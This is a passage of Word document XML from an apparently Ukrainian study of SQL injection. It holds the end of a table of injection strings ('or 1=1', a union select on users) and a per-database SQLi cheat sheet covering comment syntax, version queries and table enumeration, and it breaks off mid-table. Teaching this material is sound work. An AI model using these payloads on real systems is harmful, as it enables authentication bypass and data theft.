      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67099F72" w14:textId="3EBD1886" w:rsidR="00A419FD" w:rsidRDefault="00B80A77" w:rsidP="00B80A77">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Закінчення таблиці 2.1</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ae"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1113"/>
        <w:gridCol w:w="2163"/>
        <w:gridCol w:w="3419"/>
        <w:gridCol w:w="1383"/>
        <w:gridCol w:w="1776"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B80A77" w:rsidRPr="007D796A" w14:paraId="1E6AF352" w14:textId="77777777" w:rsidTr="00B80A77">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D359FF0" w14:textId="68C1DC04" w:rsidR="00B80A77" w:rsidRPr="004E1666" w:rsidRDefault="00B80A77" w:rsidP="00B80A77">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E1666">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>or 1=1 /*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D45B1B2" w14:textId="702262E3" w:rsidR="00B80A77" w:rsidRPr="004E1666" w:rsidRDefault="00B80A77" w:rsidP="00B80A77">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E1666">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>‘Passwprd:*/=1--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3456" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25BEEF01" w14:textId="72388BB5" w:rsidR="00B80A77" w:rsidRPr="004E1666" w:rsidRDefault="00B80A77" w:rsidP="00B80A77">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA42BB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>‘union select * from users where login = char(114,111,111,116);</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E3BE39" w14:textId="7E5498A9" w:rsidR="00B80A77" w:rsidRPr="004E1666" w:rsidRDefault="00B80A77" w:rsidP="00B80A77">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E1666">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>‘or username like char(37);</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1836" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="440567C6" w14:textId="0E71799E" w:rsidR="00B80A77" w:rsidRPr="004E1666" w:rsidRDefault="00B80A77" w:rsidP="00B80A77">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005027FB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>@var select @var as var into temp end --</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B5E3244" w14:textId="0A7295CD" w:rsidR="00B80A77" w:rsidRDefault="00B80A77" w:rsidP="00B80A77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E9A17A" w14:textId="606643E8" w:rsidR="00B72CB3" w:rsidRDefault="00B72CB3" w:rsidP="00B72CB3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>У таблиці 2.2 наведені рядки тестування, які допомагають визначити тип бази даних і отримати корисну інформацію з цієї бази даних.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E480B26" w14:textId="24DFC347" w:rsidR="00B72CB3" w:rsidRDefault="00B72CB3" w:rsidP="00B72CB3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37533670" w14:textId="4468C302" w:rsidR="00B72CB3" w:rsidRDefault="00B72CB3" w:rsidP="00B72CB3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Таблиця 2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020E0583" w14:textId="72286AD8" w:rsidR="00B72CB3" w:rsidRDefault="00B72CB3" w:rsidP="00B72CB3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>cheat</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sheet</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>шпаргалка)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ae"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2407"/>
        <w:gridCol w:w="2407"/>
        <w:gridCol w:w="2407"/>
        <w:gridCol w:w="2407"/>
      </w:tblGrid>
      <w:tr w:rsidR="004E1666" w14:paraId="5070BA48" w14:textId="77777777" w:rsidTr="002F1513">
        <w:trPr>
          <w:trHeight w:val="344"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60646B75" w14:textId="485D37D4" w:rsidR="004E1666" w:rsidRPr="004E1666" w:rsidRDefault="004E1666" w:rsidP="00B72CB3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E1666">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="077B5607" w14:textId="7064FBD4" w:rsidR="004E1666" w:rsidRPr="004E1666" w:rsidRDefault="004E1666" w:rsidP="00B72CB3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E1666">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>Microsoft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="219FFAF3" w14:textId="4D73D455" w:rsidR="004E1666" w:rsidRPr="004E1666" w:rsidRDefault="004E1666" w:rsidP="00B72CB3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E1666">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="116AFCCB" w14:textId="077E9A39" w:rsidR="004E1666" w:rsidRPr="004E1666" w:rsidRDefault="004E1666" w:rsidP="00B72CB3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E1666">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E1666" w14:paraId="15D9EFDC" w14:textId="77777777" w:rsidTr="002F1513">
        <w:trPr>
          <w:trHeight w:val="330"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E8435A7" w14:textId="43C0F76A" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>SUBSTR('foobar', 4, 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63D0E108" w14:textId="27B6F1D0" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SUBSTRING('foobar', 4, 2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="510B1478" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="311D2067" w14:textId="4CD05139" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>SUBSTRING('foobar', 4, 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="513C6C73" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:br/>
              <w:t>SUBSTRING('foobar', 4, 2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4570DCF8" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E1666" w14:paraId="5BBE4D05" w14:textId="77777777" w:rsidTr="002F1513">
        <w:trPr>
          <w:trHeight w:val="330"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58C6BE44" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:br/>
              <w:t>--comment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04B8EA41" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44FF8299" w14:textId="08752373" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>--comment</w:t>
            </w:r>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>/*comment*/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4931AF12" w14:textId="3067934D" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>--comment</w:t>
            </w:r>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:br/>
              <w:t>/*comment*/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19421042" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A080E38" w14:textId="108AC98B" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:rStyle w:val="inlinecode"/>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>#comment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1676844D" w14:textId="6A233D8F" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>/*comment*/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E1666" w14:paraId="7FD5D66C" w14:textId="77777777" w:rsidTr="002F1513">
        <w:trPr>
          <w:trHeight w:val="330"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="421EC2AC" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>SELECT banner FROM v$version</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44E7EE45" w14:textId="69AB2F91" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0947032A" w14:textId="590C520B" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SELECT @@version</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10ACA410" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A1EA8DE" w14:textId="7EC24AC2" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>SELECT version()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="534F8078" w14:textId="3762816F" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SELECT @@version</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15412930" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E1666" w14:paraId="5577817A" w14:textId="77777777" w:rsidTr="002F1513">
        <w:trPr>
          <w:trHeight w:val="330"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BDF3C46" w14:textId="5AFBE0ED" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>SELECT * FROM all_tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E1801D0" w14:textId="2A4DEAD7" w:rsidR="004E1666" w:rsidRPr="00BA42BB" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA42BB">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SELECT * FROM information_schema.tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A0A697B" w14:textId="5698E413" w:rsidR="004E1666" w:rsidRPr="00BA42BB" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA42BB">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SELECT * FROM information_schema.tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="752CDA4A" w14:textId="77777777" w:rsidR="004E1666" w:rsidRPr="002F1513" w:rsidRDefault="004E1666" w:rsidP="004E1666">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA42BB">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002F1513">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SELECT * FROM information_schema.tables</w:t>
            </w:r>
          </w:p>
